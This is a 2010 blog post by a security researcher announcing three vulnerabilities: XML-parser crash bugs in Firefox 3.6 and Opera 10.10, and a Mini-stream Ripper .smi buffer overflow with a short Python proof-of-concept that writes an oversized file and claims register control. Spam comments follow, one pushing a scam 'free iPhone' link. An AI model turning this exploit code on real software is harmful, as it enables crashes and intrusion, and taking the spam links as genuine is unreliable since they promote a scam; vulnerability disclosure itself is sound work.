Just some updates..

Posted by schaba on January 25, 2010 Leave a comment (18) Go to comments

I published 3 vulnerabilities past days and coudn’t get a time to update.so here it is.

Firefox 3.6 (XML parser) Memory Corruption PoC
Mozilla Firefox 3.6 and earlier 3.0.x versions allows remote attackers to cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags.

proof of concept exploit-db

Opera 10.10 (XML parser) Denial of Service

After opening the opera.html browser hang for a while and crush.same bug in firefox too :d
This vulnerability cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags.

proof of concept exploit-db

Mini-stream Ripper 3.0.1.1 (.smi) Local Buffer Overflow PoC 

#!/usr/bin/python
# Tested on: win XPsp3
# webpage: d3b4g.info

#EAX 00E1C880
#EDX 00000001
#EBX 41414141------------------------------------------------
#ESP 000D198C
#EBP 00E1C880          controle over registers
#ESI 41414141------------------------------------------------
#EDI 00E1C880
#EIP 00431302 Ripper.00431302
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 0  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 0  DS 0023 32bit 0(FFFFFFFF)

chars = "A"*90000
crush = "\x41\x41\x41\x41"
file=open('exp.smi','w')
file.write(chars+crush+chars)
file.close()

proof of concept exploit-db

I found a interesting bug in IE8 while testing my sexy fuzzer which I’m developing, will update it later after digging into it.
That’s all foalk’s

Proof of Concept, Vulnerabilities, , ,
Leave a comment

18 Comments.

  1. Koziołek January 26, 2010 at 9:47 pm

    Ubuntu 9.10 and Firefox 3.6 (build 20100115133306) doesn’t turn off :) It is probably only on Windows.

  2. Władysław January 27, 2010 at 9:44 am

    These exploits work only in FF and Opera for Windows. Don’t affect browsers under Unix and Unix-like OSes like BSD, OS X or Linux. Seems that that is a problem with MS Windows memory management not with the browser ability to parse XML.

    Wadyslaw

  3. Vanda Mefford August 18, 2010 at 5:28 am

    Thanks for the intresting Blog but i would like to let you, the internet site administrator and everyone who gets the chance to read this about a way to get a new IPhone 4G. Its incredibly simple. You goto the internet site fill in your email and other details then you get the free of charge Iphone 4G. You may well believe its a scam but here is why it isn’t… They send you a Iphone that already has some apps installed on it so when you brouse the web you will see their Adverts. Thats IT! And the adverts arn’t annoying they’re the same as normal ads seen on websites. http://freeiphone4g4u.blogspot.com/2010/07/how-to-get-free-iphone-4g.html. That offer is only availible in the US though, if your anywhere else you may also get a free IPad from here http://freeiphone4g4u.blogspot.com/2010/08/free-ipad.html.

  4. Alonzo Vaneaton August 19, 2010 at 12:33 am

    Thanks this made for intresting reading. I really like your wordpress theme, i frequently come back here and i dont know why. I just actually like your site lol… I just now read something simular to this on That Are i think they might of stolen the blog?

  5. Emmett Budrow August 24, 2010 at 9:59 am

    The Good!These Content articles Composed too great,they Abundant contents and Info accurately.they are help to me.I Assume to see

  6. Arlen Unikel August 24, 2010 at 2:11 pm

    I love it,Fantastic article.I am decide to put this into use 1 of these Day times.Thank you for sharing this.To Your Success!

  7. Walter Finell August 27, 2010 at 7:52 am

    Your Thought coincides with mine.and I Believe it’s Far better.

  8. Valentin Trish August 28, 2010 at 8:51 am

    Amazing stuff,Many thanks so much for this!This is very useful post for me. This will absolutely going to Aid me in my projects .

  9. Yelena Pearce August 29, 2010 at 12:54 pm

    Ha, that? Truly a really Excellent suggestion. Many thanks so much for this!

  10. Chere Lanctot August 30, 2010 at 3:44 pm

    Good article, Every and Every Stage is Excellent enough.Many thanks for sharing with us your wisdom.

  11. flint low cost mls September 1, 2010 at 8:46 pm

    Useful information, many thanks to the author. It is puzzling to me now, but in general, the usefulness and importance is overwhelming. Very much thanks again and good luck!

  12. Sandal Boy September 2, 2010 at 6:18 am

    Your web site has really been helpful to me and I thank you for your time and effort working on it. Keep up the good work. :)

  13. Zachary Chaven September 2, 2010 at 9:46 am

    This is all very new to me and this article Seriously opened my Eye.Many thanks for sharing with us your wisdom.

  14. Lawrence Pellon September 3, 2010 at 3:43 am

    Facts to my Company ;-) Please Maintain it up. I look for your Articles on my iphone rss feed every day.

  15. Lauralee Setchell September 3, 2010 at 7:20 am

    Amazing stuff,Many thanks so much for this!This is very Helpful Article for me. This will Completely going to Support me in my Tasks .

  16. Darin Mccurty September 3, 2010 at 10:55 am

    I was actually Seeming for this resource a Several weeks back. Many thanks for sharing with us your wisdom.This will absolutely going to Aid me in my Assignments .

  17. Chantelle Cardonia September 5, 2010 at 4:35 am

    Really great, practicly explained and Helpful Guidelines.

  18. apb aimbot September 6, 2010 at 12:35 am

    Hmm, I hope I percieve this the way it was intended..

Leave a Reply


[ Ctrl + Enter ]